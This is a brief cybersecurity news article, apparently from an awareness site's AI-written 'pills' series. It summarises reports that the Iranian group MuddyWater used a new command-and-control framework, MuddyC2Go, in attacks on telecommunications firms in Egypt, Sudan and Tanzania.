AI DevwWrld Chatbot Summit Cyber Revolution Summit CYSEC Global Cyber Security & Cloud Expo World Series Digital Identity & Authentication Summit Middle East Low Code No Code Summit TimeAI Summit

Cyber Warfare fragments: attacks in Africa with MuddyC2Go

Under the radar: operational tactics and emerging tools of the MuddyWater group

Iranian hacker group MuddyWater has strengthened attacks on telecommunications in Africa, via a new system called MuddyC2Go. This system, managed remotely, facilitates cyber attacks and spreads through phishing emails or by exploiting vulnerabilities in outdated software. MuddyWater will try to remain undetected for as long as possible to achieve its goals.

Contribute to spreading the culture of prevention!
Support our cause with a small donation by helping us raise awareness among users and companies about cyber threats and defense solutions.

This pill is also available in Italian language

An Iranian state actor known as MuddyWater has stepped up its attacks against the telecommunications sector in several African countries, employing a new command and control (C2) platform called MuddyC2Go. Also identified as Seedworm, and with other aliases such as Boggy Serpens and Cobalt Ulster, the group allegedly operates under the orders of the Iranian Ministry of Intelligence and Security (MOIS). The attacks are predominantly concentrated in the Middle East but, as reported by the Symantec Threat Hunter Team, have recently spread to Egypt, Sudan and Tanzania.

Features and usage of the MuddyC2Go framework

The MuddyC2Go framework, developed in Golang, was first identified by Deep Instinct as a successor to PhonyC2 and MuddyC3, but there are hints that suggest its use as early as 2020. Although the full breadth of its capabilities is not yet clear , comes with a PowerShell script that facilitates automatic connection to the C2 server managed by Seedworm, thus allowing remote access to the system without manual intervention.

Operational methods in recent attacks

Recent November 2023 assaults have shown the combined use of legitimate tools such as SimpleHelp and Venom Proxy, as well as custom keyloggers and other publicly available tools. MuddyWater's attack chains involve the use of phishing emails and the execution of known vulnerabilities in outdated applications, then continuing with reconnaissance, lateral movement and data collection activities within the victim networks.

MuddyWater's innovation and fulfillment strategy

While mixing proprietary tools, living-off-the-land techniques, and public tools, MuddyWater aims to evade detection to accomplish its strategic goals for as long as possible. Symantec highlights the group's constant innovation and development of its arsenal to remain covert, highlighting heavy use of PowerShell and related scripts as an indicator of suspicious activity. In parallel, an Israel-linked group known as Gonjeshke Darande (“Raider Hawk” in Persian) has claimed cyber sabotage acts affecting most gas stations in Iran, in response to regional aggression by the Islamic Republic and its affiliates .

Follow us on Facebook for more pills like this

12/19/2023 12:28

Editorial AI

Last pills

LockBit's tenacious activity despite global investigationsChallenges and countermeasures in the war against the LockBit cyber criminal group

Avast fined for illegitimate sale of web dataFines and restrictions imposed on cybersecurity company for misuse of personal data

KeyTrap: DNSSEC flaw discovered by researchersThe vulnerability puts the stability of DNSSEC at risk

Pact between technology companies against electoral manipulationJoint technology initiative to preserve the integrity of democratic voting